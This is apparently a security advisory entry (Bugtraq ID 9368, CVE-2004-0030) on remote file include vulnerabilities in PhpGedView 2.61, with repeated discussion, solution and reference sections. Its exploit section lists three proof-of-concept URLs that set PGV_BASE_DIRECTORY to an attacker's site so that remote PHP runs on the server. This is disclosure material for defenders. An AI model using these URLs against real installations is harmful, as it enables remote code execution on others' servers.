PhpGedView Multiple PHP Remote File Include Vulnerabilities
BID:9368
Info
PhpGedView Multiple PHP Remote File Include Vulnerabilities
| Bugtraq ID: | 9368 |
| Class: | Input Validation Error |
| CVE: |
CVE-2004-0030 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 06 2004 12:00AM |
| Updated: | Jul 12 2009 12:56AM |
| Credit: | Discovery is credited to Windak. |
| Vulnerable: |
PhpGedView PhpGedView 2.61 |
| Not Vulnerable: | |
Discussion
PhpGedView Multiple PHP Remote File Include Vulnerabilities
PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.
PhpGedView is prone to multiple file include vulnerabilities. The source of the issue is that a number of scripts that ship with the software permit remote users to influence require() paths for various external files. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.
These issues are reported to affect PhpGedView 2.61. Other versions are also likely affected.
Exploit / POC
PhpGedView Multiple PHP Remote File Include Vulnerabilities
The following examples were provided:
http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
The following examples were provided:
http://www.example.com/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
http://www.example.com/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://[attacker's_site]
Solution / Fix
PhpGedView Multiple PHP Remote File Include Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
PhpGedView Multiple PHP Remote File Include Vulnerabilities
References:
References:
- PhpGedView Homepage (PhpGedView)
- Vuln in PHPGEDVIEW 2.61 Multi-Problem (Vietnamese Security Group
)